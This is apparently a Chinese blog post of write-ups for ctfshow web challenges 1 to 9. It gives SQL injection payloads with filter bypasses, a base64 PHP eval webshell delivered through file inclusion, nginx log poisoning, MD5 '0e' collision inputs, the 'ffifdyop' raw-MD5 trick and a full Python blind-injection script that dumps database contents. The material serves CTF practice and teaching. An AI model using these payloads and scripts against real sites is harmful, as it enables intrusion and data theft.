ctfshow刷题

2023-08-06

ctfshow

web1-签到

直接查看网页源码,看见base64编码,解码后得到flag

web2-最简单的SQL注入

看见输入框直接尝试万能密码

username=admin' or 1 = 1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

username=admin' or 1 = 1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'

username=admin' or 1 = 1 union select 1,group_concat(flag),3 from flag#&password=123

web3-文件包含1

 <?php /* Challenge source: the include path comes straight from the url GET parameter with no validation, which is what the data:// and log-file tricks below rely on; an allow-list of includable files would close it. */ include($_GET['url']);?> 

使用data://

?url=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==
// <?php eval($_POST[1]); ?>

传入一句话木马,使用蚁剑连,拿到flag

web4-文件包含2

页面和上一题一样,但使用data和filter都会报错,不过可以读取文件
读取nginx日志

?url=/var/log/nginx/access.log

发现有UA,可以在UA中写入一句话木马,使用蚁剑连,拿到flag

还存在远程包含漏洞,在自己的服务器上写入一句话木马,使用蚁剑连,拿到flag

web5-弱比较

<?php
        // Challenge source: two GET parameters are accepted only if their
        // MD5 digests compare equal under loose comparison.
        $flag="";
        $v1=$_GET['v1'];
        $v2=$_GET['v2'];
        if(isset($v1) && isset($v2)){
            // v1 must consist of letters only, v2 must be a numeric string.
            if(!ctype_alpha($v1)){
                die("v1 error");
            }
            if(!is_numeric($v2)){
                die("v2 error");
            }
            // Loose == between two hex digest strings: when both sides look
            // numeric PHP compares them as numbers, so two different digests
            // of the form "0e<digits>" both evaluate to 0 and compare equal.
            // A strict === (or hash_equals) compares the bytes and avoids this.
            if(md5($v1)==md5($v2)){
                echo $flag;
            }
        }else{
        
            echo "where is flag?";
        }
    ?>

使用0e绕过

QNKCDZO 0e830400451993494058024219903391
240610708 0e462097431906509019562988736854 
s878926199a 0e545993274517709034328855841020 
s155964671a 0e342768416822451524974117254469 
s214587387a 0e848240448830537924465865611904 
s214587387a 0e848240448830537924465865611904 
s878926199a 0e545993274517709034328855841020 
s1091221200a 0e940624217856561557816327384675 
s1885207154a 0e509367213418206700842008763514 
s1502113478a 0e861580163291561247404381396064 
s1885207154a 0e509367213418206700842008763514 
s1836677006a 0e481036490867661113260034900752 
s155964671a 0e342768416822451524974117254469 
s1184209335a 0e072485820392773389523109082030 
s1665632922a 0e731198061491163073197128363787 
s1502113478a 0e861580163291561247404381396064 
s1836677006a 0e481036490867661113260034900752 
s1091221200a 0e940624217856561557816327384675 
s155964671a 0e342768416822451524974117254469 
s1502113478a 0e861580163291561247404381396064 
s155964671a 0e342768416822451524974117254469 
s1665632922a 0e731198061491163073197128363787 
s155964671a 0e342768416822451524974117254469 
s1091221200a 0e940624217856561557816327384675 
s1836677006a 0e481036490867661113260034900752 
s1885207154a 0e509367213418206700842008763514 
s532378020a 0e220463095855511507588041205815 
s878926199a 0e545993274517709034328855841020 
s1091221200a 0e940624217856561557816327384675 
s214587387a 0e848240448830537924465865611904 
s1502113478a 0e861580163291561247404381396064 
s1091221200a 0e940624217856561557816327384675 
s1665632922a 0e731198061491163073197128363787 
s1885207154a 0e509367213418206700842008763514 
s1836677006a 0e481036490867661113260034900752 
s1665632922a 0e731198061491163073197128363787 
s878926199a 0e545993274517709034328855841020

payload

?v1=QNKCDZO&v2=240610708

web6-sql注入过滤了空格

和前面那题一样,然后页面提示 sql inject error

原来是过滤了空格,使用/**/绕过

username=1'/**/or/**/1/**/=/**/1#&password=1

username=1'/**/or/**/1/**/=/**/1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1

username=1'/**/or/**/1/**/=/**/1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=1

username=1'/**/or/**/1/**/=/**/1/**/union/**/select/**/1,flag,3/**/from/**/flag#&password=1

还可以使用 %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 绕过

web7-sql注入过滤了空格和单引号

?id=1/**/union/**/select/**/1,2,3#

?id=1/**/union/**/select/**/1,database(),3#

?id=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#

?id=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name="flag"#

?id=1/**/union/**/select/**/1,flag,3/**/from/**/flag#

web8-盲注

过滤了空格、逗号和单引号

  • 我的垃圾脚本
import requests

# Base URL of the challenge instance; every probe below is appended after the
# trailing "or" so the boolean expression becomes part of the WHERE clause.
# Spaces are written as /**/ because the challenge filters whitespace.
url="http://3348c179-5956-47f2-9636-5d8b98359fbf.challenge.ctf.show/index.php?id=-1/**/or/**/"

# Sent with every request so the server closes the connection after each probe.
headers = {'Connection': 'close'}

def db_name():
    """Recover the current database name one character at a time.

    For each position ``i`` the script probes every printable ASCII code
    ``j``; a response body containing ``If`` is what this script treats as
    the injected condition being true. ``payload1`` (ascii == 0, i.e. the
    substring is empty) marks the end of the name. Both probes are issued on
    every inner iteration, and the ``break`` only leaves the inner loop, so
    the outer loop still runs to its limit.

    Returns:
        The recovered database name as a ``str``.
    """
    db_list=[]
    payload = "ascii(substr(database()/**/from/**/{}/**/for/**/1))={}"
    payload1="ascii(substr(database()/**/from/**/{}/**/for/**/1))=0"
    for i in range(1,65): # database names are at most 64 characters long
        for j in range(32,126): # ASCII 32-126 are the printable characters
            req=requests.get(url+payload.format(i,j),headers=headers)
            req1=requests.get(url+payload1.format(i),headers=headers)
            if "If" in req.text:
                db_list.append(chr(j))
                continue
            if "If" in req1.text:
                break
    return ''.join(db_list)

def tb_name():
    """Enumerate the table names of the current database.

    First probes the table count for 1..19 (``table_num`` is only bound when
    one of those counts matches), then recovers each table name character by
    character via ``limit 1 offset i``. As in ``db_name``, a response containing
    ``If`` is taken as the condition being true and the ``=0`` probe marks the
    end of a name.

    Returns:
        A ``list`` of table-name strings, one per table found.
    """
    table_list=[]
    # Count how many tables the current database has.
    payload1="(SELECT/**/count(table_name)/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database())={}"
    for i in range(1,20):
        req=requests.get(url+payload1.format(i),headers=headers)
        if "If" in req.text:
            table_num=i
            break
    print("数据库中有{}张表".format(table_num))
    for i in range(table_num):
        tname=""
        print("第{}张表".format(i+1))
        for j in range(1,50): # table names of up to 50 characters
            for k in range(32, 126): # ASCII 32-126 are the printable characters
                payload2="(ascii(substr((SELECT/**/table_name/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database()/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))={}"
                req=requests.get(url+payload2.format(i,j,k),headers=headers)
                payload3="(ascii(substr((SELECT/**/table_name/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database()/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))=0"
                req1=requests.get(url+payload3.format(i,j),headers=headers)
                if "If" in req.text:
                    tname+=chr(k)
                    continue
                if "If" in req1.text:
                    break
        table_list.append(tname)
    return table_list

def col_name(tb_name):
    """Enumerate the column names of every table in ``tb_name``.

    Note that the parameter shadows the module-level ``tb_name`` function.
    Table names are embedded in the probe with double quotes because the
    challenge filters single quotes. For each table the column count is probed
    for 1..19 (``col_num`` stays 0 if none matches), then each column name is
    recovered character by character using the same ``If`` / ``=0`` signals as
    ``db_name``.

    Args:
        tb_name: iterable of table-name strings.

    Returns:
        A flat ``list`` of column-name strings across all tables.
    """
    col_list=[]
    for i in tb_name:
        print("表名为:{}".format(i))
        col_num=0
        for j in range(1,20): 
            payload1="(SELECT/**/count(column_name)/**/FROM/**/information_schema.columns/**/WHERE/**/table_name=\"{}\")={}"
            req=requests.get(url+payload1.format(i,j),headers=headers)
            if "If" in req.text:
                col_num=j
                break
        print("表{}中有{}列".format(i,col_num))
        for j in range(col_num): 
            cname=""
            print("第{}列".format(j+1))
            for k in range(1,50): 
                for l in range(32, 126):
                    payload2="(ascii(substr((SELECT/**/column_name/**/FROM/**/information_schema.columns/**/WHERE/**/table_name=\"{}\"/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))={}"
                    req=requests.get(url+payload2.format(i,j,k,l),headers=headers)
                    payload3="(ascii(substr((SELECT/**/column_name/**/FROM/**/information_schema.columns/**/WHERE/**/table_name=\"{}\"/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))=0"
                    req1=requests.get(url+payload3.format(i,j,k),headers=headers)
                    if "If" in req.text:
                        cname+=chr(l)
                        continue
                    if "If" in req1.text:
                        break
            col_list.append(cname)
    return col_list


def col_data(tb_name,col_name):
    """Dump the values of every ``col_name`` column from every ``tb_name`` table.

    Both parameters shadow the module-level functions of the same names. The
    row-count probe fills ``1={}`` in its WHERE clause with the same ``k`` used
    as the count target, so it only matches when ``k`` is 1 and the table holds
    one row; otherwise ``data_num`` stays 0. Values are then recovered character
    by character with the same ``If`` / ``=0`` signals as ``db_name``.
    ``payload3.format`` receives one more argument (``m``) than it has
    placeholders; ``str.format`` ignores the extra one.

    Args:
        tb_name: iterable of table-name strings.
        col_name: iterable of column-name strings.

    Returns:
        A flat ``list`` of recovered value strings.
    """
    data_list=[]
    for i in tb_name:
        print("表名为:{}".format(i))
        for j in col_name:
            print("列名为:{}".format(j))
            data_num=0
            for k in range(1,20): 
                payload1="(SELECT/**/count({})/**/FROM/**/{}/**/WHERE/**/1={})={}"
                req=requests.get(url+payload1.format(j,i,k,k),headers=headers)
                if "If" in req.text:
                    data_num=k
                    break
            print("表{}中列{}有{}条数据".format(i,j,data_num))
            for k in range(data_num):
                dname=""
                print("第{}条数据".format(k+1))
                for l in range(1,50): 
                    for m in range(32, 126):
                        payload2="(ascii(substr((SELECT/**/{}/**/FROM/**/{}/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))={}"
                        req=requests.get(url+payload2.format(j,i,k,l,m),headers=headers)
                        payload3="(ascii(substr((SELECT/**/{}/**/FROM/**/{}/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))=0"
                        req1=requests.get(url+payload3.format(j,i,k,l,m),headers=headers)
                        if "If" in req.text:
                            # print(chr(m))
                            dname+=chr(m)
                            continue
                        if "If" in req1.text:
                            break
                data_list.append(dname)
    return data_list

# Script entry point: runs at import time and prints the dumped column values.
# tb_name() is called twice in this expression (once directly, once inside
# col_name(...)), so the table enumeration is performed twice.
# print("数据库名称为:{}".format(db_name()))
print("数据库中的数据为:{}".format(col_data(tb_name(),col_name(tb_name())))) 

# print("数据库名称为:{}".format(db_name()))
# # print("数据库中的表为:{}".format(tb_name()))
# print("数据库中的列为:{}".format(col_name(tb_name())))

web9-md5

使用dirsearch扫到/robots.txt,访问/robots.txt,发现/index.phps,访问/index.phps,发现源码

<?php
// Challenge source: the raw (binary) MD5 digest of the password is spliced
// into the SQL string.
$flag="";
$password=$_POST['password'];
if(strlen($password)>10){
    die("password error");
}
// md5($password,true) returns 16 raw bytes rather than a hex string, and they
// are concatenated into the query unescaped, so any digest containing a quote
// followed by SQL text alters the query. Binding the value with a mysqli
// prepared statement (or using the hex digest) keeps it from being parsed as SQL.
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
    while($row=mysqli_fetch_assoc($result)){
        echo "登陆成功<br>";
        echo $flag;
        }
}
?>

payload

ffifdyop

原理是

md5('ffifdyop',true)='or'6xxxxxx(原始二进制输出以 'or'6 开头,xxxxxx 为其余不可打印字节)